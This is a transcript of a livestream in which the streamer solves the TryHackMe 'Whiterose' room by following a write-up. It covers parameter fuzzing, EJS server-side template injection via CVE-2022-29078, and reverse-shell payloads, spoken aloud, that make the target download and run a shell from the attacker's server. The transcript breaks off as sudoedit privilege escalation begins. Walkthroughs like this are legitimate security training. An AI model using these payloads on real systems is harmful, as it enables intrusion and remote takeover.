Sneaky steps and shadowy ways. Welcome to the lair where the code is crafty and the hacks are always ethical. Let's dive into the shadows. Alright guys, so I started doing Whiterose, a newer Try Hack Me room, a few days ago. Not really sure how long it's been quite a while, but I'm back for part 2 of that room. I'm not really super confident about knowing actually how to get through this as it sits, so I think I'm gonna I've got the one of the write-ups pulled up for the room. This is gonna be more for like just learning tonight, I think. Yeah, I'm not too confident that I actually know what I'm doing, so I'm gonna see how far I can get with the write-up. Do a little bit, see how far I can get on my own, and then if I need it, then I'll just continue using the write-up. So yeah, let's go ahead and get into it. So far, let's see. I was able to find out what Tyrell Wellick's phone number was by logging in and with the credentials that were provided. This is kind of an assumed breach scenario, it seems, because we already have credentials. So let's see. So we got into the admin panel, and we were able to use an IDOR vulnerability to get the rest of the messages and get Gail's password, and that allowed us to log in with her credentials, and now we're logged in as her. And then let's see. So we were able to get Tyrell Wellick's phone number, and now we're trying to figure out how to abuse this customer settings panel. I already know that it's SSTI or server-side template injection. I'm just really not sure how on my own to go about actually testing that. For actual vulnerabilities and then exploiting that. So I'm gonna take a look at the write-up to see what they did. I'm still not super strong in web app pen testing, so this is a good learning opportunity for me for this. Turn the music down just a little bit. Alright, so testing the name and password parameters for vulnerabilities like SQL or SSTI, server-side template injection, we do not find anything. So let's fuzz for any other parameters the settings endpoint might accept. Using fuzz faster, you fool. For this, we discover a couple of interesting parameters. Okay. So let me just copy this. I'll have to provide my cookie. I'll just copy all of this. Would also be a really great idea to understand what all of these options do in here, because I'm not really super familiar with that. So let me just do this. I'll just paste this in here for the moment. And then I'll do Control-C. And then let's understand what these actual parameters do. Okay, so we know, so we have fuzz faster u full is the command line tool. And then we have U for the URL. Okay, I understand that. And then -X must be the HTTP method. It looks like we're setting that as post. And then -H is this content type header, okay. And then we have another header called cookie, and that will provide our cookie that we have currently. I do not know what -MC is, so let's see. Is fast G full, ted H, grep MC. Let's see. Match HTTP status codes. Okay. So we're gonna match all HTTP status codes. What is D? Oh dear. Let's see. Okay, -D is for post data. Okay. That makes sense. Name equals test at password and test equals fuzz equals let me say that again. Name equals test and password equals test and fuzz equals test. Okay. And then we have -W for word list. We're using user share, seclist, discovery, web content, raft, small words, lowercase.text. I believe this -T is for threads. I do not know what -FS is. Is it here? Let me see. FS. Damn it. FS. Filter HTTP response size. Okay. So we're going to be looking for the HTTP response size of 2098. Okay. Interesting. Alright, so really all I need to change is the cookie that's used. I need to use my cookie. I should be able to get that pretty easily. Whoops. Control-Shift-I, yes. Storage. This is my cookie. Can I copy that? Okay. Oh, and I need connect.sid. And, actually, I guess I can leave that in. I don't need to change that at all. I just need to put in my cookie. Okay, so I'll go all the way over here. And I just need to... It might be the same. I doubt it is, though. It's probably dynamically generated, I would imagine. Okay. Put that right there. I'm not gonna check to see if that was actually different or not. I'm guessing it's probably dynamically generated. Okay, so we'll run that. We have include error password message client. Async. Is that all that we're gonna find? Yeah, I believe so. I could stop it. Oh, okay, there we go. So it finally finished. Okay, so we've got include error password message client and async. This is 500 error, or 500 status, 200, 200, 200, 500, 200. Okay. What does the write-up say? It says, while the error and message parameters simply cause the server to include their values in the response, the include, client, and async parameters are more interesting. When the include and client parameters are present, the server returns a 500 response with an error like this. Okay. Wait, what? When the include and client parameters are present... Oh, okay. Down here. So here's include. Gives us a 500 error. Okay. Okay. Oh, okay, so what we're seeing here, this is what that, this is the same as this. This is just the full output of this. Okay. And when we use the async parameter, we simply receive open and close curly braces in the response. Okay. From the error, we learned that the application uses EJS as a template engine. If the application directly passes the other way we can tell that, I believe, is by using Wapalizer. We can see that this uses Express. EJS. Oh wait, no. Oh, embedded JavaScript templates. EJS is a simple templating language that lets you generate HTML markup with plain JavaScript. No religiousness about how to organize things. Okay. I thought that had something to do with Express. JS deliver. Express template engine. Oh no, okay, so I don't think okay, so yeah, EJS and Express are not synonymous. I think that Express is just a JavaScript rendering engine, and then EJS is the embedded JavaScript is an embedded JavaScript templating engine. Okay. Hey, welcome in, Anonymous Clover 317. Let's see. Alright, so let's see what's next. From the error, we learned that the application uses EJS as a template engine. If the application directly passes our request body to the render function as the data argument, this could lead to a server-side template injection vulnerability. This is because EJS allows certain options, such as client and async, to be included in the same argument as the data. Notably, the fact that the client option causes an error and using the async option results in the server responding with only open-close curly braces suggests that this might be the case here. We can try to confirm this by using the delimiter option, which is also one of the options allowed to be passed along with data. By default, it is set to %. If we change it to a string that does not exist in the template, we should be able to leak the template. Testing our theory, we find that we are correct as we successfully leak the template. Okay, so how do we do that? Okay. So we fuzz this with name equals test and password equals test, and delimiter equals does not exist. Okay. Let me try that. I guess I'll turn intercept on. Okay. Do intercept response to this request. Okay. Wait. I think I just need to replace this stuff at the bottom. Actually, let me send this to repeater. And then I can edit this. Name equals test and password equals test. Whoops. Name equals test and password equals test. And delimiter equals does not exist. Does not exist. Okay, and then I need to oh, how do I How do I set these as parameters? Do I not have to do that anymore? Maybe I just have to send this. Did that work? Oh, does this do this automatically now? Huh. You used to have to actually set these parameters, but it seems like Burp Suite does that automatically now. That's interesting. Include if... Let's see, doc type HTML. Is that what we saw here? Or did this not work? This is not the expected output. I wonder what I did wrong. Name equals test, and password equals test, and delimiter equals does not exist. What am I missing here? Going alright. How are you, Anonymous Clover? I'm missing $1 million. Anyone seen it? If that's true, I'm sorry to hear that. Huh? What am I doing wrong here? Why is the refer different here? I wonder if that matters. Because this has /settings in the refer, but mine does not have that. I wonder if that matters. Nah, but if someone did find 1 million, just wanted to hand it to me, I'd be alright. Wonder if this will change the output. No? Wonder what the issue is then. Name equals test and password equals test and delimiter equals does not exist. What am I doing wrong? Oh, this is a get parameter. That's why, or this is a it's supposed to be a post HTTP method. That's why that isn't working. Okay, that still doesn't seem to be right though. What is the issue? Okay, so you have post parameter slash settings admin.cypressbank.thm for the host. User agent accept. Accept language, accepting coding, gzip deflate br. It's all the same. Admin.cypressbank.thm slash settings. For the origin. Wait, I don't have an origin header. Maybe that's why. The origin is supposed to be... Do I have content length? Content type, content length, origin. Well, here's content length. What was the other header? Content length 46, origin. Content type, content length. Missing a bunch of headers. Oh, I know what the problem is. Okay. Let me forward this. Test. Test. Save. Not now. Okay. So now, okay, so this is all correct now. Let me send this to repeater. Okay, here we go. Now we've got the right things here. Okay. Now, if we go down... Okay, so I just need to add on the delimiter parameter equals does not exist. Okay. And delimiter, whoops, delimiter equals does not exist. Okay, this should work, I believe. Should give us the template. If it doesn't, then I'll have to figure out why that is, but I'm not really sure at the moment. This all seems right just from a first glance. Same content length. Cookie. Delimiter. Delimiter? Oh, crap. I spelled delimiter wrong, that's why. It's delimiter. Send. There we go. I believe, yes. Okay, so now this is working. So we've got include components equal and slash head. Include components slash navbar. Okay, so now I can actually see the template. There we go. That is working as intended now. Include component slash head, include slash component slash navbar, logged true active settings, if type of message is not equal to undefined. Okay. Okay. Awesome. So we got that going on now. Let's see. As I mentioned before, there are only a limited number of options allowed to be passed along with data. However, this is where the CVE 2022-29078 vulnerability comes into play. By using the settings view options parameter, we are able to pass any option without limitation. And there are certain options like output function name that are used by EJS without any filtration to build the template body, allowing us to inject code. You can find more information about the vulnerability in the POC here in this article. Okay, let's take a look at that. Oh, whoops. Disable that. Okay. EJS, server-side template injection, remote code execution. CVE 2022-29078, write-up. Note, the objective of this research or any similar researches is to improve the Node.js ecosystem security level. Recently, I was working on a related project using one of the most popular Node.js templating engines, embedded JavaScript templates, EJS. In my weekend, I started to have a look around to see if the library is vulnerable to server-side template injection. Since the library is open source, we can have a white box approach and look at the source code. You can use a debugger to put several breakpoints to understand the code flow quickly. Or at least you can do a print or console.log to see what function is called and what are the variables values. Okay. The analysis. Noticed an interesting thing in the render function. Okay. Exports.render equals function template d of our data equals d pipe double pipe to open and close curly brace var ops equals O. Okay, no options object if there are optiony names. I think that's probably a typo there. And the data, copy them to options if arguments.length is equal to 2. Utils.shallow copy from list ops data underscore ops underscore passable with data return handle cache ops template data. Okay. The data and options are merged together through this function. Utils.shallow copy from list. So in theory, we can overwrite the template options with the data coming from the user. A look into the function shows it has some restrictions. Exports.shallow copy from list equals function to from list. For var I equals 0, I is less than list.length, I plus plus. Var p equals list I, if type of from p is not equal to undefined, to p equals from p, return to, okay. It only copies the data if it's in the past list defined. Okay, var ops passable with data, delimiter scope context debug, compile debug, client with underscore with, rm whitespace, strict file name async. Okay, it's time to have a proof of concept and let's try these options to see what impact we can make. Index.js, const express equals require express, const app equals express, const port equals 3000, app.set view engine ejs, app.get slash page rec res, okay, res.render page rec query, .listen port, console.log example app listening on port, $sign port, okay, page.ejs, h1 you're viewing page number, ID, okay. Now if we launch the application and send this request, for example, http://localhost:3000/page question mark ID equals 2 and debug equals true, this will end up enabling EJS debug mode, but there is not much impact because if there are no errors, nothing will show. Okay, let's try something else. What about the delimiter? http://localhost:3000/question mark delimiter equals not exist delimiter. Okay, this is interesting because it will disclose the template because the delimiter does not exist. One more thing I tried here is to try to exploit to have a redos attack. I'm guessing that it should be DDoS attack. Because this delimiter is added to regex, and this regex is executed against the template contents. Hey, welcome in, Cybernerd Dante. Good to see you. How have you been? Let's see. One more thing I tried here is to try to exploit to, okay, right, to have a DDoS attack because this delimiter is added to regex and this regex is executed against the template contents. Create regex function, var string equals regex underscore string, var delim equals utils.escape regex xp chars, this.ops.delimiter, var open equals utils.escape regex p chars. This.ops.open delimiter, var close equals utils.escape regex p chars, this.ops.close delimiter, string equals string.replace, okay, delim.replace, open, replace, close, return new, regex p string, okay. So, if we added a delimiter, xx, the regex will be like this, okay. But the problem, as you see above, that it's well escaped. Utils.escape regex p chars, so we can't actually put any regex reserved characters, star, $, open, and close brace, etc. So basically we can't do something catastrophic here. Okay, that's boring. What will be really exciting is to find remote code execution. The remote code execution exploit. I spent some time looking around till I find these interesting lines in the render file function. Okay. I've been good. Glad to see you online. Happy hacking, man. That's good. Yeah, I'm happy to be online. It's been a little bit more difficult to stream with work. I'm just so tired after work lately. But yeah, I'm glad to be doing some hacking today. So yeah, continuing on. Okay, so we're looking at the EJS server-side templates, and we're trying to exploit server-side template injection in the this web app. And we're looking at the customer settings page, and this is apparently vulnerable to server-side template injection, and so we're trying to see, trying to exploit that. And I'm using the write-up because I kind of don't really know what I'm doing here. So I'm trying to learn and, you know, trying to convey that understanding as best I can to the audience. So yeah, and I'm going over this this article on EJS server-side template injection to understand the vulnerability and how to exploit it a lot better. Okay, so I spent some time looking around till I found these interesting lines in the render file function. Okay, undocumented after Express 2, but still usable ESP4. Items that are unsafe to be passed along with data like root. View opts equals data.settings, view options. If view opts, utils.shallow copy opts, view opts. Okay. Interesting. So in the case of Express, view options, EJS will copy everything into the options without restrictions. Okay. Bingo. Now what we need is just to find an option included in the template body without escaping. Okay. So if we injected code in the output function name option, it will be included in the source code. Okay. Payload like this. X semicolon process dot main module dot require child underscore process dot exec sync touch temp pwned. Will be added to the template compiled code. Okay. And our code will be executed successfully. So let's try a reverse shell. First, let's run netcat on our machine at the leet port, of course, because we're leet hackers. And let's inject some code. Okay. HTTP :// localhost :3000 / page $ID equals 2 and settings. View options, output function name equals X, semicolon process dot main module dot require child process dot exec sync, netcat tac E, sh 127001, leet, semicolon S. Okay, and here we go. I can't make this any larger, unfortunately, though. Okay, so we get a connection back. Alright, so now that I understand the vulnerability a little bit better, let's go back to the write-up. Let's see. Science, try it till it works. I'm a noob hacker, not elite yet. Yeah, I'm kind of intermediate in some areas and kind of lacking in others. Like web app, I still need a lot of training on. But I have a pretty good grasp on the basics, and there are certain more advanced topics that I have a pretty decent understanding of, and have performed penetration testing before. Okay, so where are we? Getting back into this. Okay, settings, view options, parameter. We are able to pass any option without limitation. And there are certain options like output function name that are used by EJS without any filtration to build the template body, allowing us to inject code into it. Okay, so then we read the article about the vulnerability in the point of concept, or is that right? Point of concept? That doesn't sound right. Was that what POC stands for? POC. Proof. Yeah, that's right. Yeah, I don't know why. I always get it mixed up with proof and point for some reason. Proof of concept. Yes. Thank you, Cybernerd. Okay. Testing the proof of concept payload from the article. We find that it works as we receive a request on our server. Where does this actually go? Oh, this screenshot below probably shows us. Okay, right. It goes in the... right after the password parameter. Okay, so... we're using settings. Okay. What is this? Is this just the proof of concept? Yeah. Okay. So I can copy this, and then I just need to change the IP address. Okay. So instead of delimiter, put this in. Is this? I'm not sure if this is supposed to be the target or the attacker machine. We receive a request on our server. Okay, so maybe I just need to set up a simple web server. Okay, so then we copy this. I think I copied that. Maybe. What am I doing? Okay. Alright, so then I'll just replace this with my IP. Send. You think that worked? Yes, awesome. Okay. Yeah, I believe I did that correctly. Let's see. Give that man a treat. I have Oreos or Chips Ahoy. Darn it, now I don't want to do this box, lol. I hate SSTI. Yeah, I've done it before, but I've only done it once, and I still am not super familiar with it, so I'm using the write-up in this case because I'm really kind of lost. But I think I'm getting a better understanding of how it works now. And I'm sure there are different templating engines, so it's not going to look the same every time. That's kind of one of the things that I find difficult about web apps is, like, you'll have an example, but, like, and you'll understand that pretty well, but then you'll have a different technology that does it a different way. And so, you know, not at, you don't have a, one size doesn't fit all, you know, you don't have a one size fits all solution most of the time with web app, which is something about it that I find kind of difficult to get over, I guess you could say. Okay, so that worked for sure. That's pretty cool. We got a response back. 200 status code. Exactly like we see here. Which means that we have code execution because we were able to get a response from our server. Okay, so that's pretty sweet. That's pretty awesome. Okay, now we can use it to obtain a shell, first by using our web server to serve a reverse shell payload. Okay. So I guess I can just copy this. Wait, cat index.html. Okay, so I need to make an index.html file, and it needs to have this code. Okay, and then I start the web server, and then I modify the payload to make the server download and run our reverse shell payload. Okay. Sending our payload, we can see that the server hangs and we receive a shell as the web user. Okay, awesome. Alright, so I'll just copy. I think I already copied this code, but just make sure. Okay, so let me stop this. I'll do nano index.html. Then I'll just paste this code in there. Escape, shift 4. Okay, that looks good. Actually, I do need to change. Wait, where's the IP address? Oh, it's right here. Okay. Need to change that to my IP address. My IP address for my VPN is 10.2.24.111. I'm not gonna do 443. I'm gonna do elite. So I'm elite hacker. I'll save that. Okay. I'll set up a netcat listener over here. Netcat tech LVNP elite or 1337 if you're lame. Just kidding. I'll rename this netcat, and I'll rename this web server just for ease of use. Okay, then I'll start up my web server again, and wait, what? Oh, just by using curl, I believe this reads the index.html file. Okay. I was like, where does this specify actually reading index.html? I guess it doesn't really need to, though, because curl understands the index.html file. Okay, interesting. So now I need this payload. I'm gonna swap this I think to there, right? Yes. Okay. And then I just need to change the IP to my IP. 10.2.24.111, right? 10.2.24.111. Okay. Alright, I guess I just need to send this now then. Send. And it should hang, and I should have a reverse shell now. And we do. Awesome. Okay. And we are web. I wonder if I should try to stabilize this. Let's see.
It worked! It worked!
Indeed it does. Shit. pty.spawn /dash. Oh fuck, I probably just fucked this. And I did, of course. Crap. Alright, I think I just need to send this again then. Or not. Fuck. I may have really screwed myself. 124, 111. It's hung, but I don't have a shell. Oh, I haven't. Crap. Maybe if I cancel it and send it again. No? Shit. Haha, awesome. Change port number, it might still be active on machine. But it's listening. So I don't think that's the issue. Yeah, I'll try. Crap. I wonder if I just fudge this completely. Send. I'm not getting a response back at all. At all. Okay, so that's still good. Scan for open port. The port should be open. I still, cause it's listening for incoming connections. I'm just not sure. Wonder if you just get one shot at this. Wait a second. I got a 504 gateway timeout. Oh crap, I hope my machine didn't die. Oh, 16 minutes. Okay, let me add an hour. Man, I need to, I maybe should stop trying to stabilize my shell. It just, I just really like doing it because then if I do accidentally hit Control C, it won't exit my shell. But by trying to actually stabilize my shell a lot of the time, I end up killing my shell. Because it just takes one, messed up character and it goes into like a you know, like asking for input, and then you can't get out of that without doing Control C, so it just kills it. One shot, one opportunity to capture or let it slip. Life my ass, I feel that I usually only stabilize if I need to write to files or write huge commands. Yeah. I really feel like it's something that I should do, so I try to do it, but then it always ends up biting me in the ass when I do it. Okay, maybe? No. God dang it. I might have to reset the machine. This sucks. Damn it. Sometimes I'm such a bad hacker. Reset or try another port. Is that the right command? Maybe that's not the right command. Is it...
I'm such a bad hacker. Bad.
There we go. Okay. Alright, yeah, I guess I can try a different port. I'll just do 443. And I don't have to specify that or anything here. Okay, so let's try sending this again. Crap. I think I'm gonna have to reset the machine because changing the port didn't even do anything. Damn, that sucks. It's not too bad though. Not too bad. I guess I can just leave these going. But I'm gonna go ahead and reset the machine, which doesn't actually exist on TryHackMe. I actually have to terminate the machine. So I'll go ahead and terminate the machine and start up a new one. Aw, man, yeah, the machine ate itself. Yeah, sure did. Sucks. It's alright though. Not too big of a deal. I know how to get to where I was before. Womp womp. Isn't there an emoji for that? Or an emote for that? Remember, one shot, one opportunity, lol. Yeah, okay. I think maybe I won't try to stabilize my shell this time. Okay, so I have the target IP address. I'll copy that. Let me just use... I'll just use this tab. I'll add this to my host file. Oh, I actually do need to bring the web server down now that I think about it, because I have to change the IP address. Okay, so I'll save that. I'll bring this down real quick. And then I'll edit this. Oh wait, no. I don't need to change that because that's my VPN IP. What am I thinking here? Come on, guys. Give me... Tell me when I'm being a dork. Okay, so this should all be good then. Okay. I just need to change... Okay. I just need to refresh this, resend. Okay, so I have to log in with the credentials again. Alright, I need the password. Paste. Log in. Not now. Eminem got dink donk instead of womp womp. Oh my god, that's one of my absolutely favorite emotes, Anonymous Clover. I love the little Pepe Bell emote so much. It's like the best thing ever. It makes me feel so good. It's adorable. Being human equals mistakes, not a dork. Yeah, you're right. I appreciate that, Anonymous Clover. Okay, so now we go to messages, and then we're going to take advantage of this iDoor vulnerability to look at all the messages and get the password of Gail Bev. Okay, copy that, then we log out. Gail Bev. Put her password in, log in. Not now. Okay, and then we go to settings. And then I think I don't need to actually change anything in here. No. Okay. I think I can just send this because I already have this as part of my host file. Admin.cypress.bank.thm. I've already changed the IP address that maps to that DNS address. So I think I just need to send this now. Oh shit. Good thing I didn't send that yet because I need to start this up again. Okay. And I have my netcat listener going. Hopefully this works and I don't screw it up. Okay, so send. Did that work? Shit. Redirecting to /login. Oh crap. It's because this is an old freaking... Gosh dang it. It's because this is an old request. Okay, so I need to get this again then. Test. Need to turn my proxy on, save. Then I send this to Peter. Then I do, and I put that there, and I think that is all I need to do, and I should hopefully get a reverse shell now. Cross your fingers. Oh. I'm the real dork here. I thought Olivia8 was the username, and I was trying to brute force into the web app. Hello. You're totally fine, cyber nerd. Okay. So, let me send this, and hopefully I will get a reverse shell. Awesome! Okay. So we're back on track. We are web. I'm not going to try to stabilize the shell because I don't want that to bite me in the ass again. ls cd into /home /web cat user.text. Okay, we have the first flag, the user.text flag, or the user flag. I will go ahead and turn off the proxy, scroll down here, and put this in here. Submit that. Okay, now I need to do privesc to find out what root.text is. Okay. Find /-perm-4002 is greater than /dev/null. So I'll start by looking for files that have the sued bit set. Snapd snap-confine. Wait a second. Do we have sudo privileges? I doubt we do. Wait, what? User web may run the following commands on Cypress Bank. Okay. We do have sudo. We can run sudo edit etsy nginx sites available admin.cypressbank.thm. Very interesting. Okay. Sudo edit etsy nginx sites available admin.cypressbank.thm. Oh, I have to run this with sudo. Oh crap. Man, if I stabilized my shell, then I wouldn't have to deal with that crap. Me looking at code. Okay, let me just copy this. That would be a lot easier. And then I'll just paste this. What does this do? Okay. Server listen 80 server underscore name admin.cypressbank.thm. Location proxy pass localhost 8080. HTTP underscore upgrade connection upgrade proxy set header host $host proxy cache bypass HTTP underscore upgrade. What can we do with this? How can we abuse this? Oh crap. Seriously? $host isn't sanitized. Oh, okay. Yeah, that's being passed as a parameter. Okay. Hmm. Crap, I think I actually needed to stabilize the shell because I don't think I can actually get out of this. Fuck. Stupid Nano. I mean, it's not really Nano that's the problem. I'm gonna have to do this again, aren't I? Because I'm gonna have to do Control-C to actually get out of this. Are you freaking kidding me? This is the worst. Hold on, I'll grab some Lysol. Oh my god. I'm gonna have to hit Control-C and kill my shell. I don't see any other way of getting around this. Unless there's some trick that I'm completely unaware of. I don't think so, though. Hey, welcome in, Jug Pearl. Hello, what are we doing? I am going through, the, Whiterose room on Trihack Me. It's a fairly new room. By fairly new, I mean it's about a week old now, I think.
Jugpearl followed your channel.
It might just Control-C out of Nano. Okay, I'll try it then. Commit murder. God. That's a little extreme, don't you think, Anonymous Clover? Thank you so much for the follow, Jug Pearl. I really appreciate it. Okay. Yeah, alright. Let me try that then. No! I fucking knew it! It killed the shell! There's no way that I'm gonna be able to get this back, is there? I'm gonna have to terminate the machine and do this over. Unless... No, of course not. God dang it. Alright, so I actually will have to stabilize my shell then. Damn it! That sucks. Alright. This sucks. I have to go through the entire process again. This sucks. Okay. Terminate. Terminate machine. I should have saved the password. Damn it. You know what? Just in case I have to do this one more time, or possibly more times than that, I'm gonna go ahead and save the admin password. Oh my god, come on. Sucks. Okay, so I'm gonna put this, the correct IP in here. In a sec. About 30 seconds. Oh my god. I'm such a bad hacker.
I'm such a bad hacker. Bad, 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 bad.
Okay, so we have an IP address. I'll copy that and paste that in here and save this. Okay.
The planet!
Alright. So we've got my web server going still. And I've got my Netcat listener going as well. Okay, so I need to stop this, refresh. Not now. Okay. Log in. Paste that, and then grab the password. Log in. How did I find the first flag? I can show you that in a second. So do you mean this Tyrell Wellick's phone number, or do you mean well, I mean this would be the first flag. This is kind of a flag too, I would say, though. So technically this is the second flag. Both the phone number and the other one. Okay, so I guess it's pretty good then that I did this over again so I can kind of explain that. Okay, so when I log in with the credentials, because this is seems, you know, kind of like an assumed breach scenario where you actually have credentials already. I log in here, and then I'm looking for Tyrell Wellick's phone number. I cannot see it as the current logged in user, as you can see here. So then the way that I found his phone number is I went over to messages, and then there is a vulnerability in this C parameter that is called IDOR, or Insecure Direct Object Reference. I can see the past messages if I change this number to a higher number. And then I see that I have a password for Gail Bev right here. Because for whatever reason she decided to send that in this public messages. So I have her password. You know what I'm gonna do, actually? So if I have to do this again, I'm gonna have that password. Okay, so I've got that. So now I just need to log out. Oh, crap. Actually, crap. Oh, actually, no, that's right. Okay. So now I log in as Gail Bev. I'm doing the right thing. I don't know why I'm thinking I'm doing the wrong thing. Okay, paste that in there. So we log in as her now. Actually, I could just save this. I'll just do that. And now, since this is an admin account, we can see Tyrell Wellick's phone number right here. And the user.text flag, the way that we get that is we get a reverse shell by going over to this settings panel. I'm going to turn on my burp proxy again. I'm just gonna enter in test here. And then I'm gonna save this, and I think this should be all primed and ready to go. I'm just gonna go ahead and drop that. Intercept is on. Then I just need to hit save on this, and that takes me here. Then I just right click here, and I'll just send this to repeater. And then all I need to do is I do and then I need this from the write-up. So this this payload here is what allows us to send so I have a index.html file that contains this payload here, which is a Python 3 reverse shell. And I changed the port to 443, so I have my netcat listener set up to receive the reverse shell. And I have my web server set up because this payload is going to curl my web server. I do have to change this to be my IP address for my VPN, which is 10.2.24.111. And then, let's see. Fire Gale for breaking security protocols. Wait, can't you use that password to get into SSH? Actually, no, you can't. Oh, never mind, that wouldn't work, yeah. So basically this payload is creating a child process from the request. And do a curl request for reverse shell. Basically, this payload is creating a child process from the request. Huh, I never thought about it like that. So what would be the parent process? Let's see. In dot require method, one of the parameters is set to child underscore process. Oh, is it really? Oh, you're right, it is. Okay. I didn't notice that. In settings, view options, output function name equals x, semicolon process dot main module dot require child underscore process dot exec sync curl. Okay. Yep, you're right. Also there's an ad, so I can't hear you. Oh, it should be over now, I think. Maybe? I think the ad is over now. Okay, so everything should be set up. Oh, we're back. Okay, good. Alright. Yeah, that's really interesting. I didn't notice that. Okay, so we'll send this. And hopefully we got a reverse shell. Okay, so this is a good sign. We got a 200 response. Okay, awesome. I am going to attempt to stabilize the shell now, because I need to do that in order to use Nano later on, for Privesc. Let's see, Python 3 text C, import, pty, semicolon, pty dot spawn, bin bash. Ah! I believe... Oh crap. I don't know if I should hit Control C. Crap, what's the next... what's the next thing? Backgrounding it, right? Okay, so it's suspended. And... Scroll above... am I doing this in the right order? Where when do I do export term equals x term? Is that after I run this command? It's been a while since I've done that. Oh yeah. Okay, that's the okay. This is the last thing. Okay, so I shouldn't run this yet. Export term equals x term. Okay. Oh shit, did I do this out of order? Crap, I may have done this out of order. Oh, crap. Man, I always... It's been such a long time since I've done this, I've forgotten how to do it. I should have a bookmark for that somewhere. Oh yeah, here we go. Da, da, da. Okay, so I run this first. Oh crap, okay, then... Okay. Okay, so I was doing this in the right order. Okay, so I've background it and then run this, and then set the terminal emulator to xterm. Okay. I thought I was doing this right, I just wasn't sure. Okay, foreground, and then export term equals xterm. Then enter, and I should be able to do Control-C now and not exit out. Okay, awesome. My shell is stabilized now. Oh, so going on. So in order to get the first flag, or the second flag, whatever you want to call it, the user.txt flag, I changed my directory to /home. And then there's one home directory that I can see, and it's called web. So then we'll change our directory into there, and then run ls to see what directories and files exist in that directory. And then there's user.txt. So then I just had to cat that. Okay, so that is the user.txt flag. Let's see. Oh, that's weird. I guess I found notes in a different order, but I guess it works either way. Sorry for the distraction. Oh no, you're fine, Cybernerd. Appreciate the assistance. Just trying to get my story straight. Dante equals Sensei Master. LOL, can I hate some Oreos? Anonymous Clover 317. Double stuff, you get 2. Is that supposed to say eat? Or did you actually mean to say hate, Cybernerd? Got to make sure you don't eat too much junk food. Yep. Alrighty, so continuing on, what I found out is when I ran sudo tac l, we have the ability to run the sudo edit command line tool against this file. Okay, so if I run sudo edit, and then I'll just copy the rest of this. I can edit this file, but I have to figure out exactly how to abuse this. Proxy set header host, $host. I could set host to my attacker machine's IP address. I don't know, like, if there's a cron job that runs this, or how this actually works, though. So I'm not actually sure how this gets executed. Let's see. Automod held a message for reason, sex-based terms, allow, will post it to chat. Have star haha fat fingered it. I'm gonna allow that. That's not sexual. Have, okay. Yeah, exactly, I typed it like a dork. Yeah, fat fingered it. Based on when you have context surrounding that, it's not inappropriate, so I'm gonna allow that. I don't know. I might decide to actually like loosen those filters a little bit anyway, though, because I don't know. Fire auto. Yeah, I wonder how this gets executed. Oh crap. Please don't tell me that this got completely fucked by doing that. Oh shit, are you kidding me? I cannot win tonight with this. I'm going to have to reset my terminal. Okay, sweet. So, because I stabilized my shell, I'm good though, but Nano really screwed up my shell. Okay. Yeah, I wonder how that gets executed. You know what? I'm gonna run Lin piece. Okay. I think I have, yeah, okay, I have this right here. Copy. What am I doing? There we go. Okay, copy that here. This doesn't need to be up anymore. Oh wait, I could've just, yeah, I could just leave that up. Okay, so then I'll close this. I don't really need that anymore. Hopefully there's wget on here. 10.2.24, whoops, .24.11, linkeys.sh. Okay, downloading that. That's downloaded. Chmod plus x, linkeys.sh. Now I can execute that. See what we get from the output of that. Oh wow, thank goodness. What are you referring to with that, Cybernerd? Me allowing that message through with Automon? Oh, your shell was still alive, yeah. I just had to reset the terminal because when I hit Control X on Nano to exit out of the editor, it screwed up my terminal. But luckily I just typed in reset and hit enter and it fixed it, so all good there. Yeah, there's definitely good reason to stabilize the shell if you can do it without breaking the shell in the first place. But I'm running linps now, as you can see, just to see if there's anything interesting. Like if there, maybe we could find out how exactly that file is being executed. Maybe there's a cron job for that or something. Okay, so that's done. You scroll up. One day we'll get to the top. So much freaking output. Okay, here we go. Let's see. Not very concerned with the pseudo version. What is this? Wait, what? This is 99% or 95% a privilege escalation vector? Home web.nvm versions node version 17.9.1/bin. Oh yeah, let's see. Snap/bin. Oh, this is the path. Got it. Okay. Let's see. Path hijacking the node application somehow. Wonder if I should go here. /snap/bin. Let's see what else there is. PwnKit. This probably isn't vulnerable to PwnKit. Because this is a newer machine on TryHackMe. Pseudo variants. I'm not sure all of this is always accurate. I don't think it is, because this says, machines say this a lot of the time with linps, and I'm not usually very convinced that it's actually, the machines are actually vulnerable to most of it, if not all of that, those vulnerabilities. Let's see what else. Okay, here we go. Processes, crons, timers, services, and sockets. Okay. So down here, God daemon, home web.pm2, and then we have node, home web app index.js. Okay. Oh, okay, so here's our shell right here. Apparently that's running as a cron job. That's interesting. Oh wait, this is our actual shell right here. Interesting. Oh, right, this is running under all of this, so this is running as a child process. Node must be the parent process, and then curl is the child process. And all of this is running under this. Okay. That makes sense. Here are all of my commands. That's really interesting to see that. I don't think that happens most of the time. I think it's just because of that parent-child relationship that we have this shown in. Oh wait a second. This isn't just cron tabs. This is sockets too. Oh, okay, yeah, that makes sense. And services and sockets as well. Okay, so maybe this is normal then. This is probably this would just be running the ps command. Yeah, okay. Cleaned processes. Okay. Oh, here are cron jobs. There aren't any. Okay. Or wait. Cron.d. Yeah, there's nothing really interesting here. Okay, so we have these down here. Oh, these are the default cron jobs. Okay, so nothing interesting there. Okay, here we go. Analyzing .service files. PM2-web.service is calling this. Writable, executable, home web. Writable, executable, home web. Writable, executable, home web. All of those. That really stands out. Okay. I don't think we're really too concerned with the rest of this. Okay. What is this? This must be the web app, right? Index.js. Nano index.js. I think this is just the, of course. I think this is just the vulnerable web app. But that was interesting. How we saw... Where was that? Oh yeah, right here. Writable, executable, home web. But web isn't an executable. I see there's a database. Maybe you can try to connect to it. Where did you see that? Oh, here's .pm2. Go in here. What? Oh, is that a backup directory? cd into.pm2. In the index.js there was the database name. Really? Okay. DB shell. Oh, that's not, you can't execute that. Okay. CD into app. Whoops. ls. Nano, and I'm gonna cat this, I'm not gonna nano. Yes. I don't see any database credentials. Sorry, my fault. I thought there was the name. Oh no, you're good. So we have this .pm2, which we are seeing in linpiece. Why is there a touch directory? Oh, not a directory. Permission denied. Oh. It's just a file. Okay. Interesting. If you echo $path, I remember there was a vulnerable path from linpeas, right? Oh yeah. .nvm. CD into versions node. CD into CD into bin. Core pack node npm npx pm2 pm2-dev pm2-docker pm2-runtime. Okay, so this is an executable. What is this? Oh, these are, what do you call them? Gosh dang it. Oh, I forget what you call these. Something links. What is the first word I'm looking for? Symlinks. Yeah, that's it. I'm still not sure how to go about abusing the... I don't really actually understand, like, what the privilege escalation vector is. Maybe I can at least get a little bit of background from the write-up without, you know, finding the whole solution. Oh, it's a CVE? It's not pseudo? Or that might have something to do with it, actually. Shell as root. CVE 2023-22-809. Checking the pseudo privileges for the web user, we can see that the user is able to run sudo edit etsy 